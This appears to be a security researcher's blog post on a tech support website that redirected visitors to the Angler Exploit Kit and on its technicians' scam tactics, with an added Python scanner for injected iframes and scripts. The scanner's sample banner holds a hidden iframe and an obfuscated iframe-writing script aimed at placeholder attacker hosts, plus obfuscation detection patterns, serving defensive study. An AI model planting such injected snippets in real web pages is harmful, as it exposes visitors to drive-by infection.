Google ads lead to major malvertising campaign

Tech Support website infects your computer before you even dial in

If you ever need help with your computer you may be interested in remote tech support.

As we have written many times on this blog before, the road to finding a legitimate company is very treacherous.

Many websites promoted via search-engine ads or pop-ups turn out to be run by impostors or crooks, and it doesn’t matter whether they are overseas or right here in the U.S.

This time around, our focus is on a company that seems to want a big piece of the U.S. market and boasts that its infrastructure is “ahead of time technology equipment” while “your computer issues are fixed securely”.

This couldn’t be further from the truth.

For some reason, looking at the site gives an impression of déjà-vu. Perhaps it is the template and stock photos typically used by many overseas tech support companies?

Drive-by download infection

While we shouldn’t judge a book by its cover, there is something really wrong that happens when you visit their website:

[Screenshot: the drive-by download attempt blocked by Malwarebytes Anti-Exploit]

For a company that is supposed to fix computers, performing a drive-by download infection (thankfully blocked by Malwarebytes Anti-Exploit) is not a good sign.

One of the HTML files (a banner) contains a malicious script that loads a page from a compromised website.

That page contains an iframe with a dynamically generated URL, which silently redirects the visitor to the Angler Exploit Kit:

[Screenshot: Fiddler capture of the redirection chain leading to the Angler Exploit Kit]
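The chain described above (a banner that pulls in a script from a foreign host, which in turn writes a hidden iframe pointing at an exploit kit gate) is the kind of injection a site owner can look for in their own pages. The following scanner is an added example written for this post, not code from Malwarebytes or from the site discussed; it uses only the Python standard library, and the sample HTML and the hostnames in it (`compromised-site.example`, `ek-gate.example`, `tech-support-site.example`) are constructed placeholders, not indicators taken from the actual campaign.

```python
"""Heuristic scanner for injected iframes and scripts in an HTML file.

It flags three things a defender would want to review on a hacked site:
  * <script src> tags that load from a host other than the page's own,
  * inline scripts using common obfuscation helpers or writing iframes,
  * <iframe> tags that are hidden, tiny, or point at a foreign host.
It reports candidates for a human to look at; it does not decide maliciousness.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Style fragments typically used to keep an injected iframe out of sight.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(left|top)\s*:\s*-\d{3,}", re.I
)
# Helpers frequently seen in obfuscated redirector scripts.
OBFUSCATION = re.compile(r"fromCharCode|unescape\(|eval\(", re.I)


def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixel."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


def _foreign(src, page_host):
    """True when src is an absolute URL whose host differs from the page's host."""
    host = urlparse(src).hostname
    return bool(host) and host.lower() != page_host.lower()


class InjectionScanner(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_host = urlparse(page_url).hostname or ""
        self.findings = []          # (kind, src_or_snippet, [reasons])
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src", "") or ""
            reasons = []
            if HIDDEN_STYLE.search(a.get("style") or "") or "hidden" in a:
                reasons.append("hidden by style")
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("tiny dimensions")
            if _foreign(src, self.page_host):
                reasons.append("foreign host")
            if reasons:
                self.findings.append(("iframe", src, reasons))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src")
            if src and _foreign(src, self.page_host):
                self.findings.append(("script", src, ["foreign host"]))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf)
            if OBFUSCATION.search(body) or re.search(r"<iframe", body, re.I):
                self.findings.append(
                    ("inline-script", body.strip()[:60], ["obfuscation or iframe writer"])
                )


def scan_html(html, page_url):
    """Return the list of suspicious findings for one HTML document."""
    scanner = InjectionScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample banner modelled on the chain in the post; the hosts are
# placeholders (.example), not real indicators.
PAGE_URL = "http://tech-support-site.example/banner.html"
SAMPLE_BANNER = """
<html><body>
<img src="/images/banner.png" alt="24/7 support">
<script src="/js/slider.js"></script>
<script src="http://compromised-site.example/wp-content/themes/x.js"></script>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//ek-gate.example/land%22%3E'));</script>
<iframe src="http://ek-gate.example/gate.php?id=123" width="1" height="1" style="display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for kind, what, reasons in scan_html(SAMPLE_BANNER, PAGE_URL):
        print(f"{kind:14} {', '.join(reasons):45} {what}")
```

Run it over every HTML file in the web root (the inline scripts and foreign hosts it lists are usually a very short list on a legitimate small site, so anything unexpected stands out), and compare the results against a known-good copy of the site where one exists.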

In this case, if your system had been outdated and you had no security solution, you would have fallen victim to the fileless infection, followed by additional malware.

The Trojans were already detected by Malwarebytes Anti-Malware:

[Screenshot: Malwarebytes Anti-Malware detections for the Trojans dropped by the exploit kit]

This drive-by infection almost seems like the perfect segue into a malware diagnostic. In fact, right from the beginning of our call, the technician already assumed our computer was infected.

Tech support scam

Sadly, the service provided by American Tech Help is not up to par either. The technicians are quick to point to errors and ‘hackers’ that have supposedly compromised your computer, simply by showing the (routine) warnings displayed in the Windows Event Viewer:

[Screenshot: Windows Event Viewer warnings presented by the technician as evidence of a compromise]

Alternatively, a system ‘scan’ performed using the dir command also returns a fake custom message (notice the typo):

[Screenshot: the fake “currupted” (sic) message produced by the technician’s dir ‘scan’]

But here’s the problem: before browsing to their site and calling them up, we had made sure our computer was fully patched. While the site attempted to exploit our system, it never succeeded, so the technician’s report is completely bogus.

It is quite possible that the tech support site was simply hacked because of poor security practices and that their owners aren’t aware of it.

Or perhaps they don’t even care until the major browsers start blacklisting them and they see their traffic take a dive.

People looking for tech support services really need to be careful out there. There was a time when we could say that as long as you didn’t let scam artists take remote control of your computer, you were fine.

Now the mere fact of browsing to one of their sites could be the beginning of some real troubles. It is not entirely surprising that such sites are dangerous to visit: they are built quickly, on the cheap and with little to no maintenance. This is just a recipe for disaster as any good website owner would tell you.

For more information on tech support scams and general advice, please check out our Tech Support Scams resource page.

ABOUT THE AUTHOR

Jérôme Segura

Principal Threat Researcher